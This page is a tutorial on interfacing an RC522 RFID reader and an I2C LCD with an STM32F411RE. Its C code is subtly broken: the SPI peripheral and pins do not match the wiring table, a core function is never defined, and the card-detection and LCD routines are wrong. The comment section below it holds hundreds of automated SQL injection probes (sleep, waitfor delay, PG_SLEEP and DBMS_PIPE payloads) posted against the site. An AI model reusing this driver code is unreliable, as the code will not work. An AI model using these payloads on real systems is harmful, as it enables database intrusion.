Published Jan. 25, 2025, 11:24 a.m. by Ezra Ogori
Introduction
In today’s guide, we’ll explore the use of RFID technology, understand its working principles, and learn how to interface the RC522 RFID module with the STM32F411RE microcontroller. We’ll also display the read RFID tag ID on an I2C LCD screen.
This project is ideal for security systems, attendance systems, and inventory management.
What We Will Cover:
1. The RFID Technology
2. The RC522 RFID Reader Module
3. Introduction to I2C LCD
4. Components Required
6. Pin Descriptions
7. Circuit Connection
8. Code
1. RFID Technology
RFID (Radio Frequency Identification) is a technology that uses radio waves to identify objects or individuals. RFID systems consist of two main components:
The RFID reader emits electromagnetic waves to power the tag, enabling data transmission between the two.
2. The RC522 RFID Reader Module
The RC522 module operates at a frequency of 13.56 MHz and is commonly used for reading RFID tags. It communicates with microcontrollers via SPI, I2C, or UART protocols.
Features of RC522:
3. I2C LCD The I2C LCD is a 16x2 display module that simplifies interfacing with microcontrollers using the I2C protocol. It uses only two pins (SCL and SDA) for communication.
Features of I2C LCD:
4. Components
Pin Descriptions
RC522 RFID Pin Description
Pin | Description |
---|---|
VCC | Power Supply (3.3V) |
GND | Ground |
RST | Reset |
SDA | Slave Select for SPI |
SCK | SPI Clock |
MOSI | SPI Master Out Slave In |
MISO | SPI Master In Slave Out |
I2C LCD Pin Description
Pin | Description |
---|---|
GND | Ground |
VCC | Power Supply (5V or 3.3V) |
SDA | Serial Data Line (I2C Data) |
SCL | Serial Clock Line (I2C Clock) |
A0, A1, A2 | Address Pins (Used to set I2C address) |
Backlight | Controls the LCD backlight (optional) |
6. Circuit Diagram
Component | Pin | STM32F411 Pin | Description |
---|---|---|---|
RFID RC522 | VCC | 3.3V | Power supply |
RFID RC522 | GND | GND | Ground connection |
RFID RC522 | RST | PB0 | Reset pin |
RFID RC522 | SDA | PA4 | Slave Select (SPI SS) |
RFID RC522 | SCK | PA5 | SPI Clock |
RFID RC522 | MOSI | PA7 | Master Out Slave In |
RFID RC522 | MISO | PA6 | Master In Slave Out |
I2C LCD | GND | GND | Ground connection |
I2C LCD | VCC | 3.3V | Power supply |
I2C LCD | SDA | PB7 | Data line |
I2C LCD | SCL | PB6 | Clock line |
7. Code
RC522 module:
rc522.h
#ifndef RC522_H #define RC522_H #include "stm32f4xx.h" // RC522 Pin Definitions #define RC522_RST_PIN GPIO_PIN_0 #define RC522_RST_PORT GPIOB #define RC522_SS_PIN GPIO_PIN_12 #define RC522_SS_PORT GPIOB // RC522 Commands #define PCD_IDLE 0x00 #define PCD_AUTHENT 0x0E #define PCD_RECEIVE 0x08 #define PCD_TRANSMIT 0x04 #define PCD_TRANSCEIVE 0x0C #define PCD_RESET 0x0F // RC522 Registers #define CommandReg 0x01 #define CommIEnReg 0x02 #define DivIEnReg 0x03 #define FIFODataReg 0x09 #define FIFOLevelReg 0x0A #define ControlReg 0x0C #define BitFramingReg 0x0D #define ModeReg 0x11 #define TxControlReg 0x14 #define TxASKReg 0x15 // Function Prototypes void RC522_Init(void); void RC522_Reset(void); void RC522_WriteRegister(uint8_t reg, uint8_t value); uint8_t RC522_ReadRegister(uint8_t reg); uint8_t RC522_Communicate(uint8_t command, uint8_t *sendData, uint8_t sendLen, uint8_t *receiveData, uint8_t *receiveLen); uint8_t RC522_IsNewCardPresent(void); uint8_t RC522_ReadCardSerial(uint8_t *serial); void RC522_SelectCard(void); #endif
rc522.c
#include "rc522.h" // RC522 Initialization void RC522_Init(void) { // Set RST and SS as GPIO outputs RCC->AHB1ENR |= RCC_AHB1ENR_GPIOBEN; // Enable GPIOB clock GPIOB->MODER |= (0x1 << (RC522_RST_PIN * 2)) | (0x1 << (RC522_SS_PIN * 2)); // Set RST and SS as output GPIOB->ODR |= RC522_RST_PIN; // Set RST high GPIOB->ODR |= RC522_SS_PIN; // Set SS high RC522_Reset(); // Perform a soft reset RC522_WriteRegister(TxControlReg, 0x03); // Enable antennas RC522_WriteRegister(ModeReg, 0x3D); // Default mode settings } // Perform a soft reset void RC522_Reset(void) { RC522_WriteRegister(CommandReg, PCD_RESET); } // Write to RC522 Register void RC522_WriteRegister(uint8_t reg, uint8_t value) { GPIOB->ODR &= ~RC522_SS_PIN; // Select the RC522 SPI2->DR = (reg << 1) & 0x7E; // Send address with write bit while (!(SPI2->SR & SPI_SR_TXE)); // Wait for transmission to complete SPI2->DR = value; // Send the value while (!(SPI2->SR & SPI_SR_TXE)); // Wait for transmission GPIOB->ODR |= RC522_SS_PIN; // Deselect the RC522 } // Read from RC522 Register uint8_t RC522_ReadRegister(uint8_t reg) { GPIOB->ODR &= ~RC522_SS_PIN; // Select the RC522 SPI2->DR = ((reg << 1) & 0x7E) | 0x80; // Send address with read bit while (!(SPI2->SR & SPI_SR_TXE)); // Wait for transmission while (!(SPI2->SR & SPI_SR_RXNE)); // Wait for reception SPI2->DR = 0x00; // Dummy byte to receive data while (!(SPI2->SR & SPI_SR_RXNE)); // Wait for reception uint8_t value = SPI2->DR; // Read the received data GPIOB->ODR |= RC522_SS_PIN; // Deselect the RC522 return value; } // Check if a new card is present uint8_t RC522_IsNewCardPresent(void) { uint8_t result = RC522_ReadRegister(ControlReg); return (result & 0x01); // Return 1 if a new card is present } // Read card serial number uint8_t RC522_ReadCardSerial(uint8_t *serial) { uint8_t status = RC522_Communicate(PCD_TRANSCEIVE, NULL, 0, serial, NULL); return (status == 0) ? 1 : 0; // Return 1 if successful }
I2C LCD
lcd.h
#ifndef I2C_LCD_H #define I2C_LCD_H #include "stm32f4xx.h" // LCD Address #define LCD_I2C_ADDR 0x27 // Function Prototypes void LCD_Init(void); void LCD_SendCommand(uint8_t cmd); void LCD_SendData(uint8_t data); void LCD_Print(char *str); void LCD_Clear(void); #endif
lcd.c
#include "lcd.h" // Initialize the LCD void LCD_Init(void) { // Send initialization commands LCD_SendCommand(0x38); // Function set LCD_SendCommand(0x0C); // Display ON, Cursor OFF LCD_SendCommand(0x06); // Entry mode set LCD_Clear(); // Clear display } // Send a command to the LCD void LCD_SendCommand(uint8_t cmd) { I2C1->CR1 |= I2C_CR1_START; // Generate start condition while (!(I2C1->SR1 & I2C_SR1_SB)); // Wait for start condition I2C1->DR = LCD_I2C_ADDR << 1; // Send LCD address while (!(I2C1->SR1 & I2C_SR1_ADDR)); // Wait for address ack (void)I2C1->SR2; // Clear address flag I2C1->DR = cmd; // Send command while (!(I2C1->SR1 & I2C_SR1_TXE)); // Wait for transfer complete I2C1->CR1 |= I2C_CR1_STOP; // Generate stop condition } // Send data to the LCD void LCD_SendData(uint8_t data) { LCD_SendCommand(data | 0x40); // Send data with data bit } // Print a string on the LCD void LCD_Print(char *str) { while (*str) { LCD_SendData(*str++); } } // Clear the LCD void LCD_Clear(void) { LCD_SendCommand(0x01); // Clear display command }
main.c
#include "rc522.h" #include "lcd.h" int main(void) { // System Clock Configuration SystemClock_Config(); // Initialize GPIO, SPI, and I2C GPIO_Init(); SPI_Init(); I2C_Init(); // Initialize RFID and LCD RC522_Init(); LCD_Init(); LCD_Print("Waiting for Tag..."); while (1) { if (RC522_IsNewCardPresent()) { uint8_t serial[5]; if (RC522_ReadCardSerial(serial)) { LCD_Clear(); LCD_Print("Tag ID: "); for (int i = 0; i < 5; i++) { char buf[3]; sprintf(buf, "%02X", serial[i]); LCD_Print(buf); } } } } }
8. Conclusion
This project demonstrates how to interface an RFID RC522 module with an STM32F411RE microcontroller to read tag IDs and display them on an I2C LCD. This setup can be extended to applications like attendance systems, access control systems, and inventory management.
Happy coding!
When developing embedded systems, power efficiency is one of the …
How to Choose the Ideal STM32 Microcontroller for Your Project …
In today's guide, we’ll explore how to use PWM …Introduction
pHqghUme Sept. 20, 2025, 8:57 p.m.
1
pHqghUme Sept. 20, 2025, 8:58 p.m.
AiQscz6U
pHqghUme Sept. 20, 2025, 8:58 p.m.
*1
pHqghUme Sept. 20, 2025, 8:58 p.m.
*1
pHqghUme Sept. 20, 2025, 8:58 p.m.
*1
pHqghUme Sept. 20, 2025, 8:58 p.m.
*1
pHqghUme Sept. 20, 2025, 8:58 p.m.
-1 OR 2+970-970-1=0+0+0+1
pHqghUme Sept. 20, 2025, 8:58 p.m.
-1 OR 3+970-970-1=0+0+0+1
pHqghUme Sept. 20, 2025, 8:58 p.m.
*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 20, 2025, 8:58 p.m.
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 20, 2025, 8:59 p.m.
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 20, 2025, 8:59 p.m.
1
pHqghUme Sept. 20, 2025, 8:59 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 20, 2025, 8:59 p.m.
1
pHqghUme Sept. 20, 2025, 8:59 p.m.
-1; waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 8:59 p.m.
-1); waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 8:59 p.m.
1
pHqghUme Sept. 20, 2025, 8:59 p.m.
-1 waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 9 p.m.
SylC8OJA'; waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 9 p.m.
-1 OR 457=(SELECT 457 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9 p.m.
-1) OR 967=(SELECT 967 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:01 p.m.
-1)) OR 984=(SELECT 984 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:01 p.m.
0GkTJiSf' OR 428=(SELECT 428 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:02 p.m.
rnsRpN2n') OR 38=(SELECT 38 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:02 p.m.
At4qyXrs')) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:02 p.m.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 20, 2025, 9:02 p.m.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 20, 2025, 9:02 p.m.
1
pHqghUme Sept. 20, 2025, 9:02 p.m.
'"
pHqghUme Sept. 20, 2025, 9:02 p.m.
1
pHqghUme Sept. 20, 2025, 9:02 p.m.
����%2527%2522\'\"
pHqghUme Sept. 20, 2025, 9:03 p.m.
1
pHqghUme Sept. 20, 2025, 9:03 p.m.
@@0Rd08
pHqghUmera9iXlLv Sept. 20, 2025, 9:03 p.m.
1
pHqghUme Sept. 20, 2025, 9:03 p.m.
1
-1 OR 2+542-542-1=0+0+0+1 -- Sept. 20, 2025, 9:03 p.m.
1
-1 OR 2+18-18-1=0+0+0+1 Sept. 20, 2025, 9:03 p.m.
1
-1' OR 2+428-428-1=0+0+0+1 -- Sept. 20, 2025, 9:03 p.m.
1
-1' OR 2+812-812-1=0+0+0+1 or '20BtHB31'=' Sept. 20, 2025, 9:03 p.m.
1
-1" OR 2+195-195-1=0+0+0+1 -- Sept. 20, 2025, 9:03 p.m.
1
if(now()=sysdate(),sleep(15),0) Sept. 20, 2025, 9:03 p.m.
1
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 20, 2025, 9:03 p.m.
1
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 20, 2025, 9:03 p.m.
1
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 20, 2025, 9:03 p.m.
1
pHqghUme2ZAIaCJb'; waitfor delay '0:0:15' -- Sept. 20, 2025, 9:03 p.m.
1
pHqghUmeAkem8iK9' OR 579=(SELECT 579 FROM PG_SLEEP(15))-- Sept. 20, 2025, 9:03 p.m.
1
pHqghUmeJC5zOijk') OR 304=(SELECT 304 FROM PG_SLEEP(15))-- Sept. 20, 2025, 9:04 p.m.
1
pHqghUme7HFlB7Vf')) OR 367=(SELECT 367 FROM PG_SLEEP(15))-- Sept. 20, 2025, 9:04 p.m.
1
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 20, 2025, 9:04 p.m.
1
pHqghUme Sept. 20, 2025, 9:04 p.m.
1
pHqghUme'" Sept. 20, 2025, 9:04 p.m.
1
pHqghUme����%2527%2522\'\" Sept. 20, 2025, 9:04 p.m.
1
@@8pbw8 Sept. 20, 2025, 9:04 p.m.
1
pHqghUme Sept. 20, 2025, 9:04 p.m.
1
pHqghUme Sept. 20, 2025, 9:05 p.m.
1
pHqghUme Sept. 20, 2025, 9:05 p.m.
1
pHqghUme Sept. 20, 2025, 9:05 p.m.
555
pHqghUme Sept. 20, 2025, 9:05 p.m.
1
pHqghUme Sept. 20, 2025, 9:05 p.m.
555
pHqghUme Sept. 20, 2025, 9:05 p.m.
555
pHqghUme Sept. 20, 2025, 9:05 p.m.
555
pHqghUme Sept. 20, 2025, 9:06 p.m.
1
pHqghUme Sept. 20, 2025, 9:06 p.m.
1
pHqghUme Sept. 20, 2025, 9:06 p.m.
1
pHqghUme Sept. 20, 2025, 9:06 p.m.
1E9diXeWO
pHqghUme Sept. 20, 2025, 9:06 p.m.
1
pHqghUme Sept. 20, 2025, 9:06 p.m.
-1 OR 2+678-678-1=0+0+0+1 --
pHqghUme Sept. 20, 2025, 9:06 p.m.
-1 OR 2+298-298-1=0+0+0+1
pHqghUme Sept. 20, 2025, 9:06 p.m.
-1' OR 2+55-55-1=0+0+0+1 --
pHqghUme Sept. 20, 2025, 9:06 p.m.
-1' OR 2+42-42-1=0+0+0+1 or 'bNaonr6z'='
pHqghUme Sept. 20, 2025, 9:06 p.m.
-1" OR 2+64-64-1=0+0+0+1 --
pHqghUme Sept. 20, 2025, 9:06 p.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 20, 2025, 9:06 p.m.
555
pHqghUme Sept. 20, 2025, 9:06 p.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 20, 2025, 9:06 p.m.
555
pHqghUme Sept. 20, 2025, 9:06 p.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 20, 2025, 9:06 p.m.
555
pHqghUme Sept. 20, 2025, 9:06 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 20, 2025, 9:06 p.m.
555
pHqghUme Sept. 20, 2025, 9:06 p.m.
1-1; waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 9:06 p.m.
555
pHqghUme Sept. 20, 2025, 9:07 p.m.
1-1); waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 9:07 p.m.
1-1 waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 9:07 p.m.
1bjh1Dfti'; waitfor delay '0:0:15' --
pHqghUme Sept. 20, 2025, 9:07 p.m.
1-1 OR 833=(SELECT 833 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:07 p.m.
1-1) OR 884=(SELECT 884 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:07 p.m.
1-1)) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:07 p.m.
1dnFX8i4f' OR 764=(SELECT 764 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:07 p.m.
1phse4sUV') OR 956=(SELECT 956 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:07 p.m.
1FUBLGHMy')) OR 458=(SELECT 458 FROM PG_SLEEP(15))--
pHqghUme Sept. 20, 2025, 9:07 p.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 20, 2025, 9:07 p.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 20, 2025, 9:07 p.m.
1
pHqghUme Sept. 20, 2025, 9:07 p.m.
1'"
pHqghUme Sept. 20, 2025, 9:07 p.m.
1����%2527%2522\'\"
pHqghUme Sept. 20, 2025, 9:07 p.m.
@@VStVa
pHqghUme Sept. 20, 2025, 9:07 p.m.
555
pHqghUme Sept. 20, 2025, 9:07 p.m.
555
pHqghUme Sept. 20, 2025, 9:07 p.m.
555
pHqghUmeIDftohD7 Sept. 20, 2025, 9:07 p.m.
555
pHqghUme Sept. 20, 2025, 9:07 p.m.
555
-1 OR 2+216-216-1=0+0+0+1 -- Sept. 20, 2025, 9:07 p.m.
555
-1 OR 2+899-899-1=0+0+0+1 Sept. 20, 2025, 9:07 p.m.
555
-1' OR 2+404-404-1=0+0+0+1 -- Sept. 20, 2025, 9:07 p.m.
555
-1' OR 2+858-858-1=0+0+0+1 or 'jP7NDd7e'=' Sept. 20, 2025, 9:07 p.m.
555
-1" OR 2+362-362-1=0+0+0+1 -- Sept. 20, 2025, 9:07 p.m.
555
if(now()=sysdate(),sleep(15),0) Sept. 20, 2025, 9:07 p.m.
555
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 20, 2025, 9:07 p.m.
555
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 20, 2025, 9:07 p.m.
555
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 20, 2025, 9:07 p.m.
555
pHqghUme39IH1MME'; waitfor delay '0:0:15' -- Sept. 20, 2025, 9:07 p.m.
555
pHqghUme21bHYzFi' OR 933=(SELECT 933 FROM PG_SLEEP(15))-- Sept. 20, 2025, 9:07 p.m.
555
pHqghUme1vUDBoxD') OR 357=(SELECT 357 FROM PG_SLEEP(15))-- Sept. 20, 2025, 9:07 p.m.
555
pHqghUme6Zm0nHze')) OR 755=(SELECT 755 FROM PG_SLEEP(15))-- Sept. 20, 2025, 9:08 p.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 20, 2025, 9:08 p.m.
555
pHqghUme Sept. 20, 2025, 9:08 p.m.
555
pHqghUme'" Sept. 20, 2025, 9:08 p.m.
555
pHqghUme����%2527%2522\'\" Sept. 20, 2025, 9:08 p.m.
555
@@ZRu4A Sept. 20, 2025, 9:08 p.m.
555
pHqghUme Sept. 22, 2025, 11:39 a.m.
1
pHqghUme Sept. 22, 2025, 11:39 a.m.
1
pHqghUme Sept. 22, 2025, 11:40 a.m.
555
pHqghUme Sept. 22, 2025, 11:41 a.m.
1
pHqghUme Sept. 22, 2025, 11:41 a.m.
1
pHqghUme Sept. 22, 2025, 11:42 a.m.
1
pHqghUme Sept. 22, 2025, 11:42 a.m.
555
pHqghUme Sept. 22, 2025, 11:42 a.m.
555
pHqghUme Sept. 22, 2025, 11:42 a.m.
5550l1Xb6jT
pHqghUme Sept. 22, 2025, 11:42 a.m.
1
pHqghUme Sept. 22, 2025, 11:42 a.m.
555
pHqghUme Sept. 22, 2025, 11:42 a.m.
-1 OR 2+411-411-1=0+0+0+1 --
pHqghUme Sept. 22, 2025, 11:42 a.m.
-1 OR 2+401-401-1=0+0+0+1
pHqghUme Sept. 22, 2025, 11:42 a.m.
-1' OR 2+905-905-1=0+0+0+1 --
pHqghUme Sept. 22, 2025, 11:42 a.m.
-1' OR 2+789-789-1=0+0+0+1 or '1sBv8kT6'='
pHqghUme Sept. 22, 2025, 11:42 a.m.
-1" OR 2+33-33-1=0+0+0+1 --
pHqghUme Sept. 22, 2025, 11:42 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
555*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUmePkBnrhjN Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 22, 2025, 11:43 a.m.
1
-1 OR 2+373-373-1=0+0+0+1 -- Sept. 22, 2025, 11:43 a.m.
1
-1 OR 2+486-486-1=0+0+0+1 Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1' OR 2+981-981-1=0+0+0+1 -- Sept. 22, 2025, 11:43 a.m.
1
-1' OR 2+43-43-1=0+0+0+1 or 'Mg1ILUCM'=' Sept. 22, 2025, 11:43 a.m.
1
-1" OR 2+732-732-1=0+0+0+1 -- Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
555-1; waitfor delay '0:0:15' --
if(now()=sysdate(),sleep(15),0) Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
555-1); waitfor delay '0:0:15' --
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
555-1 waitfor delay '0:0:15' --
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
555eY68kg16'; waitfor delay '0:0:15' --
pHqghUme Sept. 22, 2025, 11:43 a.m.
555-1 OR 79=(SELECT 79 FROM PG_SLEEP(15))--
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
555-1) OR 34=(SELECT 34 FROM PG_SLEEP(15))--
pHqghUmeLrTGFqVl'; waitfor delay '0:0:15' -- Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:43 a.m.
555-1)) OR 605=(SELECT 605 FROM PG_SLEEP(15))--
pHqghUmePW4Rw8F4' OR 784=(SELECT 784 FROM PG_SLEEP(15))-- Sept. 22, 2025, 11:43 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
555t0XiDGno' OR 224=(SELECT 224 FROM PG_SLEEP(15))--
pHqghUmeo1fsKAwN') OR 231=(SELECT 231 FROM PG_SLEEP(15))-- Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
555lMeI93L5') OR 694=(SELECT 694 FROM PG_SLEEP(15))--
pHqghUmewTkrhpHv')) OR 674=(SELECT 674 FROM PG_SLEEP(15))-- Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
5556D2SRvq2')) OR 627=(SELECT 627 FROM PG_SLEEP(15))--
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
1
pHqghUme'" Sept. 22, 2025, 11:44 a.m.
1
pHqghUme����%2527%2522\'\" Sept. 22, 2025, 11:44 a.m.
1
@@wDXWq Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 22, 2025, 11:44 a.m.
555
pHqghUme Sept. 22, 2025, 11:44 a.m.
555'"
pHqghUme Sept. 22, 2025, 11:44 a.m.
555����%2527%2522\'\"
pHqghUme Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
@@SXoOZ
pHqghUme Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
555
pHqghUme Sept. 22, 2025, 11:44 a.m.
1
pHqghUme Sept. 22, 2025, 11:44 a.m.
555
pHqghUme Sept. 22, 2025, 11:44 a.m.
555
pHqghUme Sept. 22, 2025, 11:45 a.m.
1
pHqghUme Sept. 22, 2025, 11:45 a.m.
1
pHqghUme Sept. 22, 2025, 11:46 a.m.
555
pHqghUme Sept. 22, 2025, 11:46 a.m.
1
pHqghUme Sept. 22, 2025, 11:46 a.m.
555
pHqghUme Sept. 22, 2025, 11:46 a.m.
1B8zj5XZB
pHqghUme Sept. 22, 2025, 11:46 a.m.
555
pHqghUme Sept. 22, 2025, 11:46 a.m.
1
pHqghUme Sept. 22, 2025, 11:46 a.m.
-1 OR 2+994-994-1=0+0+0+1 --
pHqghUme Sept. 22, 2025, 11:46 a.m.
-1 OR 2+289-289-1=0+0+0+1
pHqghUme Sept. 22, 2025, 11:46 a.m.
-1' OR 2+897-897-1=0+0+0+1 --
pHqghUme Sept. 22, 2025, 11:46 a.m.
-1' OR 2+429-429-1=0+0+0+1 or 'gbTI0M3j'='
pHqghUme Sept. 22, 2025, 11:46 a.m.
-1" OR 2+749-749-1=0+0+0+1 --
pHqghUme Sept. 22, 2025, 11:46 a.m.
555
pHqghUme Sept. 22, 2025, 11:46 a.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 22, 2025, 11:46 a.m.
555
pHqghUme Sept. 22, 2025, 11:46 a.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 22, 2025, 11:46 a.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 22, 2025, 11:46 a.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 22, 2025, 11:47 a.m.
1-1; waitfor delay '0:0:15' --
pHqghUme Sept. 22, 2025, 11:47 a.m.
1-1); waitfor delay '0:0:15' --
pHqghUme Sept. 22, 2025, 11:47 a.m.
1-1 waitfor delay '0:0:15' --
pHqghUme Sept. 22, 2025, 11:47 a.m.
1FAiU1nVj'; waitfor delay '0:0:15' --
pHqghUme Sept. 22, 2025, 11:47 a.m.
1-1 OR 472=(SELECT 472 FROM PG_SLEEP(15))--
pHqghUme Sept. 22, 2025, 11:47 a.m.
1-1) OR 515=(SELECT 515 FROM PG_SLEEP(15))--
pHqghUme Sept. 22, 2025, 11:47 a.m.
1-1)) OR 237=(SELECT 237 FROM PG_SLEEP(15))--
pHqghUme Sept. 22, 2025, 11:47 a.m.
1YzMYfBZk' OR 226=(SELECT 226 FROM PG_SLEEP(15))--
pHqghUme Sept. 22, 2025, 11:47 a.m.
555
pHqghUme Sept. 22, 2025, 11:47 a.m.
1LQvrIpFn') OR 714=(SELECT 714 FROM PG_SLEEP(15))--
pHqghUme Sept. 22, 2025, 11:47 a.m.
555
pHqghUme Sept. 22, 2025, 11:47 a.m.
1g6VAmXWt')) OR 685=(SELECT 685 FROM PG_SLEEP(15))--
pHqghUme Sept. 22, 2025, 11:47 a.m.
555
pHqghUme Sept. 22, 2025, 11:47 a.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUmeH8VTKkVh Sept. 22, 2025, 11:47 a.m.
555
pHqghUme Sept. 22, 2025, 11:47 a.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 22, 2025, 11:47 a.m.
1
pHqghUme Sept. 22, 2025, 11:47 a.m.
1'"
pHqghUme Sept. 22, 2025, 11:47 a.m.
1����%2527%2522\'\"
pHqghUme Sept. 22, 2025, 11:47 a.m.
@@9zPUn
pHqghUme Sept. 22, 2025, 11:47 a.m.
555
-1 OR 2+733-733-1=0+0+0+1 -- Sept. 22, 2025, 11:47 a.m.
555
-1 OR 2+429-429-1=0+0+0+1 Sept. 22, 2025, 11:47 a.m.
555
-1' OR 2+718-718-1=0+0+0+1 -- Sept. 22, 2025, 11:47 a.m.
555
-1' OR 2+585-585-1=0+0+0+1 or 'LABYEiMv'=' Sept. 22, 2025, 11:47 a.m.
555
-1" OR 2+56-56-1=0+0+0+1 -- Sept. 22, 2025, 11:47 a.m.
555
if(now()=sysdate(),sleep(15),0) Sept. 22, 2025, 11:47 a.m.
555
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 22, 2025, 11:47 a.m.
555
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 22, 2025, 11:47 a.m.
555
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 22, 2025, 11:47 a.m.
555
pHqghUmewxttsyp8'; waitfor delay '0:0:15' -- Sept. 22, 2025, 11:47 a.m.
555
pHqghUmeSLrpGiq3' OR 950=(SELECT 950 FROM PG_SLEEP(15))-- Sept. 22, 2025, 11:47 a.m.
555
pHqghUme6noKfUzm') OR 847=(SELECT 847 FROM PG_SLEEP(15))-- Sept. 22, 2025, 11:47 a.m.
555
pHqghUmekCVOQ1kk')) OR 878=(SELECT 878 FROM PG_SLEEP(15))-- Sept. 22, 2025, 11:48 a.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 22, 2025, 11:48 a.m.
555
pHqghUme Sept. 22, 2025, 11:48 a.m.
555
pHqghUme'" Sept. 22, 2025, 11:48 a.m.
555
